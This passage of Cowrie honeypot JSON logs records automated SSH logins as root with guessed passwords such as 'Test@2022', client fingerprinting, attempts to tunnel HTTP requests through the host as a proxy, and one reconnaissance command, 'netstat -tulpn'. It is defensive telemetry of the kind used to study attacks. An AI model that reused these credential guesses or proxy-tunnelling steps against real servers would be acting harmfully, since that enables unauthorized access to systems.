cdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.204375Z","src_ip":"77.83.207.83","session":"f2d2deb099a7"}
{"eventid":"cowrie.login.success","username":"root","password":"OABmg","message":"login attempt [root/OABmg] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.429979Z","src_ip":"201.148.180.50","session":"bcd6c3389076"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.452401Z","src_ip":"77.83.207.83","session":"f2d2deb099a7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30559,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30559","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.503290Z","session":"f2d2deb099a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.553218Z","src_ip":"77.83.207.83","session":"f2d2deb099a7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2975,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2975","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.696280Z","session":"f2d2deb099a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.746380Z","src_ip":"77.83.207.83","session":"f2d2deb099a7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":13607,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13607","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.888232Z","session":"f2d2deb099a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.938194Z","src_ip":"77.83.207.83","session":"f2d2deb099a7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:32.988845Z","src_ip":"77.83.207.83","session":"f2d2deb099a7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":16922,"dst_ip":"1.2.3.4","dst_port":22,"session":"22e803061906","protocol":"ssh","message":"New connection: 77.83.207.83:16922 (1.2.3.4:22) [session: 22e803061906]","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.039107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.040069Z","src_ip":"77.83.207.83","session":"22e803061906"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.090897Z","src_ip":"77.83.207.83","session":"22e803061906"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.344724Z","src_ip":"77.83.207.83","session":"22e803061906"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19639,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19639","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.396572Z","session":"22e803061906"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.447523Z","src_ip":"77.83.207.83","session":"22e803061906"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2372,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2372","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.589303Z","session":"22e803061906"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.641057Z","src_ip":"77.83.207.83","session":"22e803061906"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":21323,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21323","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.785252Z","session":"22e803061906"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.836216Z","src_ip":"77.83.207.83","session":"22e803061906"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.887932Z","src_ip":"77.83.207.83","session":"22e803061906"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17046,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b1af7abce1b","protocol":"ssh","message":"New connection: 77.83.207.83:17046 (1.2.3.4:22) [session: 1b1af7abce1b]","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.937300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.938196Z","src_ip":"77.83.207.83","session":"1b1af7abce1b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:33.988865Z","src_ip":"77.83.207.83","session":"1b1af7abce1b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.241041Z","src_ip":"77.83.207.83","session":"1b1af7abce1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16289,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16289","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.292384Z","session":"1b1af7abce1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.342879Z","src_ip":"77.83.207.83","session":"1b1af7abce1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":21961,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21961","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.484970Z","session":"1b1af7abce1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.535485Z","src_ip":"77.83.207.83","session":"1b1af7abce1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":9765,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9765","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.676878Z","session":"1b1af7abce1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.727477Z","src_ip":"77.83.207.83","session":"1b1af7abce1b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.739796Z","src_ip":"212.227.125.160","session":"8ec147866074"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.740501Z","src_ip":"212.227.125.160","session":"8ec147866074"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.778725Z","src_ip":"77.83.207.83","session":"1b1af7abce1b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17144,"dst_ip":"1.2.3.4","dst_port":22,"session":"35b335ba2d11","protocol":"ssh","message":"New connection: 77.83.207.83:17144 (1.2.3.4:22) [session: 35b335ba2d11]","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.828015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.828867Z","src_ip":"77.83.207.83","session":"35b335ba2d11"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.879327Z","src_ip":"77.83.207.83","session":"35b335ba2d11"}
{"eventid":"cowrie.session.closed","duration":12.777480363845825,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:34.956803Z","src_ip":"212.227.235.229","session":"7ed78da890db"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.129936Z","src_ip":"77.83.207.83","session":"35b335ba2d11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51291,"dst_ip":"1.2.3.4","dst_port":23,"session":"54b6dfcda208","protocol":"telnet","message":"New connection: 212.227.235.229:51291 (1.2.3.4:23) [session: 54b6dfcda208]","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.164640Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5753,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5753","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.181667Z","session":"35b335ba2d11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.231919Z","src_ip":"77.83.207.83","session":"35b335ba2d11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":16266,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16266","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.372621Z","session":"35b335ba2d11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.422960Z","src_ip":"77.83.207.83","session":"35b335ba2d11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":19703,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19703","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.564796Z","session":"35b335ba2d11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.615208Z","src_ip":"77.83.207.83","session":"35b335ba2d11"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.666801Z","src_ip":"77.83.207.83","session":"35b335ba2d11"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17227,"dst_ip":"1.2.3.4","dst_port":22,"session":"43ed361b0cc8","protocol":"ssh","message":"New connection: 77.83.207.83:17227 (1.2.3.4:22) [session: 43ed361b0cc8]","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.715163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.724937Z","src_ip":"77.83.207.83","session":"43ed361b0cc8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:50:35.745804Z","src_ip":"201.148.180.50","session":"bcd6c3389076"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.746455Z","src_ip":"201.148.180.50","session":"bcd6c3389076"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:35.764979Z","src_ip":"77.83.207.83","session":"43ed361b0cc8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.013538Z","src_ip":"77.83.207.83","session":"43ed361b0cc8"}
